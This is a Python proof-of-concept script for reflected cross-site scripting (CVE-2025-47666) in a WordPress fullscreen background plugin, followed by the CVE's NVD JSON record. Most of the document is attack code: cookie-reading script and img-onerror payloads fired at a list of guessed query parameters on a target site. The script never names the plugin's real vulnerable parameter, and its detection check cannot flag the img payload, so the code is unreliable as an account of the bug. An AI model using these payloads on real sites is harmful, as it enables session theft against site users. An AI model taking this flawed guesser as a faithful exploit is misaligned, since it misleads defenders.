CVE-2025-47666

import requests from urllib.parse import quote # CVE-2025-47666 PoC - Reflected XSS in WordPress lbg_fullscreen_fullwidth_slider plugin # Target: WordPress site with Image&Video FullScreen Background plugin <= 1.6.7 def generate_xss_payload(): """Generate XSS payload for the vulnerable parameter""" # Basic XSS payload payload = '<script>alert(document.cookie)</script>' # Alternative payload using img onerror alt_payload = '<img src=x onerror=alert(String.fromCharCode(67,86,69,45,50,48,50,53,45,52,55,54,54,54))>' return payload, alt_payload def test_reflected_xss(target_url): """ Test for reflected XSS vulnerability target_url: Base URL of the vulnerable WordPress site """ payloads = generate_xss_payload() # Common vulnerable parameter patterns params_to_test = [ '?search=', '?s=', '?query=', '?id=', '?page=', '?callback=', '?url=', ] results = [] for param in params_to_test: for payload in payloads: test_url = target_url + param + quote(payload) try: response = requests.get(test_url, timeout=10) # Check if payload is reflected without encoding if payload in response.text and '<script>' in payload: results.append({ 'url': test_url, 'status': 'Vulnerable', 'payload': payload, 'parameter': param.strip('?=') }) except requests.RequestException as e: print(f'Error testing {test_url}: {e}') return results # Example usage # target = 'http://example.com/wp-admin/admin.php?page=lbg_fullscreen' # results = test_reflected_xss(target) # for r in results: # print(f"Vulnerable URL: {r['url']}")

{"cve": {"id": "CVE-2025-47666", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:55.020", "lastModified": "2026-04-27T19:16:14.343", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows Reflected XSS.This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en LambertGroup Image&amp;Video FullScreen Background lbg_fullscreen_fullwidth_slider permite XSS Reflejado. Este problema afecta a Image&amp;Video FullScreen Background: desde n/d hasta &lt;= 1.6.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lbg_fullscreen_fullwidth_slider/vulnerability/wordpress-image-video-fullscreen-background-plugin-1-6-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}